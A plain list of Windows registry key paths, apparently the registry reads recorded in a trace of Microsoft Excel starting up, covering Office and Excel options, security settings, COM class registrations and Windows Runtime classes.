HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\InitFolderHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\ExePath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\CommandLine
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\IdentityType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\ActivatableClasses
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\ServerType
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableROForSharedDocs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SupportUNCMappedDriveSaveAs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\idp
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Offline\Options\CheckoutToDraftsEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableLogUnsupportedFeaturesToAppStorage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\RevisionTrimSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefaultSheetR2L
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\A4Letter
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CursorVisual
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ControlCharacters
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefaultFormat
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\VbaOff
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\VbaOff
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutomaticPictureCompressionDefault
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DiscardImageEdits
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefaultImageDPI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Saskatchewan
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Honshu
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\AllLocationsDisabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\BlockFQDNFileProtocol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\FileValidation\EnableLogging
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InProcServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ExtensionHardening
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\AllowPNG
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\RelyOnVML
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DownloadComponents
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DoNotUseLongFileNames
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DoNotOrganizeInFolder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DoNotRelyOnCSS
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\PixelsPerInch
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\Encoding
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\SkipCorruptedDrawingDataOnLoad
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ADUserName
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275c23e2-3747-11d0-9fea-00aa003f8646}\InsecureQI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\SignedOutADUser
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastWriteTimeExcel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\UseNewXmlLiteApi
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88d96a0f-f192-11d4-a65f-0040963251e5}\InsecureQI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\QFE_FlipPictures
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\NetworkResiliency
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0003000C-0000-0000-C000-000000000046}\IPersistStorageType
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MaxPropsStreamSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\BlockContentExecutionFromInternet
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Components\029E403DA86A1D115B5B0006799C897E\vbe.dll_7.1
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Features\00006109F00000000000000000F01FEC\VBAFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Features\VBAFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\832C86ABC73443044BA758069DBCC6E5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EB0C8A90D0D34D14FAB6CF05A69BBEF1\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\206169712E4CE28408A0FDE6265794FC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FFC7844B38D726447AE1F693823C83FA\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\139C3899EB73E6C3DA23B8E687B98618\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\339F228ED07C4FC39AD227368BCAFC03\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6CDA7FFC8F2164F40BC5A96F5A154C25\00006109F00000000000000000F01FEC
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\TrustBar
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DrawInkTab
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\CanvasInkOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AnimationDiagnostic
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\NoTrack
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FullCalcOnLoadOldFile
HKEY_CURRENT_USER\Control Panel\Desktop\CaretWidth
HKEY_CURRENT_USER\Control Panel\Desktop\CursorBlinkRate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\PreferOTFontIcon
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ReversedArrowTypeBracketsBraceOnBinarySave
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\ConvertRRectCalloutToFreeformForInscribedRect
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\ConvertChevronToFreeformForInscribedRect
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\DisableDocumentAssemblies
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{cacaf262-9370-4615-a13b-9f5539da4c0a}\InsecureQI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\BlockOleAutoActivate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CreateVbeProjOnLoad
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\DisableSmartDocuments
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock\XL97WorkbooksandTemplates
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Kobe
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\CustomUIRoaming
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\Animation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\ShowKbdShortcuts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\FontView
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AirSpaceOArtEnable
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\HitTestOverlayUnselectedColor
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\HitTestOverlaySelectedColor
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options\DefaultFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxTelemetryEventSent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\UpsellState
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\Sound
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\Resiliency\ResiliencySimulator
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\LastKnownC2RProductReleaseId\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\FOLDERID_Desktop
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\FOLDERID_Documents
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU\FOLDERID_Desktop
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU\FOLDERID_Documents
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{9B92EB61-CBC1-11D3-8C2D-00A0CC37B591}\1.2\0\win32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\FriendlyName
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\LabelText
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\Save
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\ShowButtons
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\ShowIndicators
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoLabelOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoSaveOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoButtonOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoIndicatorOption
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590f811-1d3a-11d0-891f-00aa004b2e24}\InsecureQI
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ServiceParameters
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RemoteServerName
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\DllSurrogate
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\DisableAppCommandsAutoInstall
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\TrustedCatalogs\ClearInstalledExtensions
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Signal\PreWarm\ExcelLastUseTimestamp
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77f10cf0-3db5-4966-b520-b7c54fd35ed6}\InsecureQI
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\ScreenTipScheme
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\ReportAmbigAccels
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Components\56DED934DF2E433449EE5A527FBB2B94\colorSchemes
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Features\00006109F00000000000000000F01FEC\OArt_DocTheme
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Features\OArt_DocTheme
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C09820D90E706754CB0F0B7163D39B8F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\624352BC0727FDB44915354E407C7881\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D478A7EC9F3E226458581EA9D150FF9A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0ADB02A9ED18DB341A895A9E410D2B82\00006109F00000000000000000F01FEC
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\DisableFontLinking
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PenPointerMode
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InsecureQI
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.RKPRY.RKR.15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\DllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\Threading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\RemoteServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivateAsUser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\Permissions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Pacific Standard Time\Dynamic DST\FirstEntry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Pacific Standard Time\Dynamic DST\LastEntry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\ValidateRegItems
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4234d49b-0245-4df3-b780-3893943456e1}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4234d49b-0245-4df3-b780-3893943456e1}\InProcServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Repository\Families\windows.immersivecontrolpanel_cw5n1h2txyewy\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\ActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\DllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\Threading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\RemoteServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\ActivateAsUser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\Permissions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{f7a88ec3-6f33-46bf-83b8-78aaf94ac396}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{f3e74273-0be4-580a-a90b-d7880a95b914}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModel\StateRepository\Cache\Package\Data\10\InstalledLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModel\StateRepository\Cache\Package\Data\10\MutableLink
